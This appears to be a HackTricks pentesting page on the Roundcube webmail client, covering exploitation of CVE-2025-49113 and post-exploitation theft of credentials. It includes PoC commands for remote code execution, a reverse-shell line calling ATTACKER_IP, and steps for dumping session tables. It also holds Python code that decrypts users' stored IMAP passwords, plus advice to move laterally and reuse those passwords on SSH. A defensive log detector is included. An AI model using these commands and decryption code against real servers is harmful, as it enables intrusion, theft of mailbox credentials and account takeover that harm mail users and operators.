Roundcube

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

Roundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:

  • The page source/JS often leaks the version via rcmail.env.rcversion (in the browser console: window.rcmail && rcmail.env.rcversion)
  • Default app path in containers/VMs: /var/www/html/roundcube
  • Main config: config/config.inc.php

Authenticated RCE via PHP object deserialization (CVE-2025-49113)

Affected versions (per vendor/NVD):

  • 1.6.x before 1.6.11
  • 1.5.x before 1.5.10

Bug summary

  • The _from parameter in program/actions/settings/upload.php is not validated, so attacker‑controlled data is stored and later unserialized by Roundcube; a PHP object‑injection gadget chain then executes in the web‑server context. Any valid mailbox login suffices (post‑auth), so a single phished or reused webmail credential is enough.

Quick exploitation

  • Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)
  • Public PoC automates session handling, gadget crafting and upload flow
git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
php CVE-2025-49113.php http://mail.target.tld USER PASS CMD

# examples
php CVE-2025-49113.php http://mail.target.tld user 'pass' "id"
# blind timing proof
time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5"

# reverse shell
nc -nvlp 443
php CVE-2025-49113.php http://mail.target.tld user 'pass' \
  "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"

Notes

  • Output is often blind; use sleep N to validate RCE
  • Resulting shell typically runs as www-data; on containerised deployments expect /.dockerenv and 172.17.0.0/16 networking
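For the blue-team side of the same bug, the following detector scans web-server access logs for settings/upload requests whose _from value is not a plain form identifier. This is an added example, not Roundcube's code and not a signature of the public PoC: the log lines are constructed, the "safe" shape of _from (letters, digits, '-' and '_') is an assumption drawn from how the settings UI uses it, and the marker list simply covers characters that carry meaning in PHP's session serialization format (|, !, ;) and serialized-object prefixes (O:, a:, s:).

```python
"""Heuristic detector for CVE-2025-49113 probing in combined-format access logs.

Added example (not Roundcube code). SAMPLE_LOG lines are constructed; the
SAFE_FROM pattern and MARKERS are heuristics, not an exact PoC signature.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache/nginx "combined" log lines.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2025:09:14:02 +0000] "GET /?_task=settings&_action=upload&_from=edit-identity HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jun/2025:09:15:41 +0000] "POST /?_task=settings&_action=upload&_from=edit-identity%21O%3A8%3A%22stdClass%22%3A0%3A%7B%7D HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.9 - - [10/Jun/2025:09:15:42 +0000] "GET /?_task=mail&_action=list HTTP/1.1" 200 2048 "-" "python-requests/2.31"
10.0.0.7 - - [10/Jun/2025:09:16:10 +0000] "POST /?_task=settings&_action=upload&_from=edit-response%7CO%3A HTTP/1.1" 200 512 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: legitimate _from values are identifiers such as "edit-identity".
SAFE_FROM = re.compile(r'^[A-Za-z0-9_-]*$')
# Session-format delimiters and PHP serialized-value prefixes.
MARKERS = ('|', '!', ';', '"', 'O:', 'a:', 's:')


def suspicious_from(value):
    """Return a reason string if the (URL-decoded) _from value is not a plain identifier, else None."""
    if SAFE_FROM.match(value):
        return None
    hits = [m for m in MARKERS if m in value]
    return "unexpected characters" + (f" ({', '.join(hits)})" if hits else "")


def scan(log_text):
    """Return one finding per settings/upload request with a suspicious _from."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if qs.get("_task") != ["settings"] or qs.get("_action") != ["upload"]:
            continue
        for val in qs.get("_from", []):      # parse_qs already URL-decodes
            reason = suspicious_from(val)
            if reason:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "from": val, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} _from={f['from']!r}: {f['reason']}")
```

Pair a hit with the session/user that made the request (Roundcube's own logs/userlogins) and with the version fingerprint: on 1.6.11 / 1.5.10 or later the request is noise, on anything older it is a compromise until proven otherwise.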

Post‑exploitation: recover IMAP passwords from Roundcube sessions

Roundcube keeps the logged‑in user’s IMAP password in the session (table session) encrypted with rcube::encrypt(), i.e. the server‑side key $config['des_key'] and the cipher named by $config['cipher_method'] (default DES-EDE3-CBC, 3DES). With filesystem or DB access on the Roundcube host you can recover plaintext passwords and pivot into other mailboxes/services (SSH credential reuse is common).

  1. Read DB DSN and 3DES key from config

config/config.inc.php typically contains:

$config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES); this value is the shipped default from config/defaults.inc.php, so an unchanged key is decryptable by anyone
  2. Connect to DB and dump sessions
mysql -u roundcube -p roundcube
# or: mysql -u roundcube -pDB_PASS roundcube

mysql> SELECT id, created, changed, vars FROM session\G

The session.vars column is a Base64 blob of the serialized session data (PHP session format: key|value;key|value;...). Inside it, the password entry is a string produced by Roundcube’s encrypt(): Base64( IV || CBC(plaintext) ). With the default DES-EDE3-CBC method the first 8 bytes after Base64‑decoding that string are the IV.

  3. Locate the password field

A quick way to spot the credential inside the decrypted structure is to first Base64‑decode the vars field and eyeball serialized entries:

echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password
  4. Decrypt using Roundcube’s helper

Roundcube ships bin/decrypt.sh, which calls the same rcmail->decrypt() with the configured des_key and cipher_method. Run it from the install directory as a user that can read config/config.inc.php (e.g. www-data):

cd /var/www/html/roundcube
./bin/decrypt.sh CIPHERTEXT_BASE64
# -> prints plaintext
  5. Manual 3DES-CBC decryption (optional)
  • Ciphertext format: Base64( IV(8B) || CT )
  • Alg: DES-EDE3-CBC (3DES), key length 24B, PKCS#7 padding; if cipher_method was changed (e.g. to AES-256-CBC) the IV is 16 bytes and the cipher differs
from base64 import b64decode

# encrypted password string taken from a session.vars entry
iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
iv, ct = iv_ct[:8], iv_ct[8:]      # 8-byte IV, then the CBC ciphertext
print(iv.hex(), ct.hex())
# next: 3DES-CBC-decrypt ct with key = $config['des_key'] and IV = iv, then strip PKCS#7 padding
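Steps 3 to 5 end to end, as an added example that is not Roundcube's own code: it pulls the password entry out of a session.vars blob, splits IV and ciphertext, and decrypts with the configured key. The session blob is constructed (PHP session format with the page's sample token as the password value), the key is the shipped default, and the layout Base64(IV || DES-EDE3-CBC(PKCS#7 text)) assumes the default cipher_method. Decryption needs either the cryptography or the pycryptodome package; the parsing and padding helpers run without them.

```python
"""Recover the IMAP password from a Roundcube session row.

Added example (not Roundcube code). SAMPLE_VARS is constructed; DES_KEY is the
default from defaults.inc.php; the token layout assumes cipher_method=DES-EDE3-CBC.
"""
import re
from base64 import b64decode, b64encode
from os import urandom

DES_KEY = b"rcmail-!24ByteDESkey*Str"   # replace with $config['des_key']
IV_LEN = 8                               # DES-EDE3-CBC block/IV size

# Constructed session.vars blob: Base64 of PHP-session-format data whose
# password value is the sample token shown above.
SAMPLE_TOKEN = "hcVCSNXOYgUXvhArn1a1OHJtDck+CFME"
SAMPLE_VARS = b64encode(
    b'temp|b:0;language|s:5:"en_US";username|s:5:"alice";'
    b'password|s:%d:"%s";' % (len(SAMPLE_TOKEN), SAMPLE_TOKEN.encode())
).decode()

try:
    try:  # cryptography >= 43 moved 3DES to the "decrepit" namespace
        from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
    except ImportError:
        from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
    from cryptography.hazmat.primitives.ciphers import Cipher, modes

    def _des3_cbc(key, iv, data, encrypt):
        ctx = Cipher(TripleDES(key), modes.CBC(iv))
        op = ctx.encryptor() if encrypt else ctx.decryptor()
        return op.update(data) + op.finalize()
    HAVE_CRYPTO = True
except ImportError:
    try:
        from Crypto.Cipher import DES3  # pycryptodome fallback

        def _des3_cbc(key, iv, data, encrypt):
            c = DES3.new(key, DES3.MODE_CBC, iv=iv)
            return c.encrypt(data) if encrypt else c.decrypt(data)
        HAVE_CRYPTO = True
    except ImportError:
        HAVE_CRYPTO = False


def extract_password_token(vars_b64):
    """Return the encrypted password string from a session.vars blob, or None."""
    raw = b64decode(vars_b64)
    m = re.search(rb'password\|s:(\d+):"', raw)   # PHP serialized string: s:<len>:"..."
    if not m:
        return None
    n = int(m.group(1))
    return raw[m.end():m.end() + n].decode()


def split_token(token_b64):
    """Base64(IV || CT) -> (iv, ct) for the 3DES layout."""
    raw = b64decode(token_b64)
    return raw[:IV_LEN], raw[IV_LEN:]


def pkcs7_unpad(data, block=8):
    n = data[-1]
    if not 1 <= n <= block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding (wrong des_key or cipher_method?)")
    return data[:-n]


def pkcs7_pad(data, block=8):
    n = block - len(data) % block
    return data + bytes([n]) * n


def roundcube_decrypt(token_b64, key=DES_KEY):
    iv, ct = split_token(token_b64)
    return pkcs7_unpad(_des3_cbc(key, iv, ct, encrypt=False))


def roundcube_encrypt(plaintext, key=DES_KEY):
    """Mirror of the encrypt() layout; used here only to build round-trip vectors."""
    iv = urandom(IV_LEN)
    return b64encode(iv + _des3_cbc(key, iv, pkcs7_pad(plaintext), encrypt=True)).decode()


if __name__ == "__main__":
    token = extract_password_token(SAMPLE_VARS)
    iv, ct = split_token(token)
    print("token:", token, "iv:", iv.hex(), "ct bytes:", len(ct))
    if HAVE_CRYPTO:
        print("round trip:", roundcube_decrypt(roundcube_encrypt(b"imap-s3cret")))
```

A padding error on a real token almost always means the wrong des_key or a non-default cipher_method rather than a corrupt row; check both values in config.inc.php before assuming the session is unusable.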

Common locations

  • DB table: session (users table maps login names to IDs)
  • Config path: /var/www/html/roundcube/config/config.inc.php

Operational use

  • Session rows of other users that have not yet expired (session_lifetime) or been garbage‑collected still hold their encrypted IMAP passwords; decrypt several entries to move laterally into other mailboxes
  • Try recovered credentials against SSH or other services if credential reuse is suspected
